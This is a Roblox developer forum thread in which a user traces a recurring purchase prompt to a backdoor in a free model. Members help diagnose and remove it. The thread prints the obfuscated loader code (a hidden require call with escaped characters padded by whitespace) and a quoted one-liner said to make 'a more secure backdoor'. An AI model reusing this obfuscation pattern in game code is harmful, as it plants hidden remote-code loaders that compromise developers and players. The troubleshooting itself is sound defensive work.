How to get rid of buy prompt for unknown asset?

You can write your topic however you want, but you need to answer these questions:

  1. What do you want to achieve? Keep it simple and clear!
    I want to get rid of this thing that keeps popping up every time I join the game.
  2. What is the issue? Include screenshots / videos if possible!
  3. What solutions have you tried so far? Did you look for solutions on the Developer Hub?

Looked at most scripts in-game, but I don’t know…I had this problem show up on my Lothal game as well.

2 Likes

Have you used any free models? Some of those tend to give viruses.

If so, find any scripts that are weird and delete them.

Not sure what else to suggest other than checking every script to solve this.

Check any free models you used, or plugins as well


https://gyazo.com/b2fa52b1556e558d5d8e541527340dcd

Can models in require give out viruses?

Press Ctrl + Shift + F to search in all scripts in your game, then type in the text box, “Prompt”.

3 Likes

I found a virus that had a script like yours, so I just deleted it and it went away. Delete that script.

There is a script somewhere in your game that is using MarketPlaceService to prompt a purchase to the client. Try searching your code for somewhere MarketPlaceService’s PromptPurchase function or PromptGamepassPurchase function. You can remove this line of code and it will stop showing up.


return function(ttt)																																																																																													local z=getfenv()	
	pcall(function()z["\114\101\113\117\105\114\101"](rrr)(ttt)end)	
	pcall(function()z["\114\101\113\117\105\114\101"](r)(ttt)end)																																																																																																																																														
	pcall(function()z["\114\101\113\117\105\114\101"](rr)(ttt)end)	
end

I’ve somehow managed to find the script for the require model above, this is what’s causing the prompt to show up, however if I disable the “Add” script. Then my other models won’t work… So I’m wondering if it’s possible to decode those.

Mind showing the full code for the script you showed above?

1 Like

I believe that’s the full script to function my other check-in guis and all, however, I want to be able to uncode this possible backdoor script.

Some kid just had to make it a “more secure backdoor” on my game, and so I demoted him and now I’m trying to figure out how to uncode it.

Deobfuscate, is what you mean?

Is this a module script? If so, what script is requiring this module script?

Yes, that’s what I meant lol. (20 chars)


https://gyazo.com/74e60cbf652fbd663190ffb3477caf38

What is the code inside the script that is requiring the module?


https://gyazo.com/30c868a4a24ad6de5430c6cf99e1e2e1


return function(ttt)																																																																																													local z=getfenv()	
	pcall(function()z["\114\101\113\117\105\114\101"](rrr)(ttt)end)	
	pcall(function()z["\114\101\113\117\105\114\101"](r)(ttt)end)																																																																																																																																														
	pcall(function()z["\114\101\113\117\105\114\101"](rr)(ttt)end)	
end

And apparently exploiters can do:

Replace the word "ID" with your main module ID.
getfenv()['\114\101\113\117\105\114\101'](ID)

For a more secure backdoor

1 Like


https://gyazo.com/95a2b82774c7b910b96b5d51bc542b15

Seems like a backdoor script. What is the reason you can’t remove it?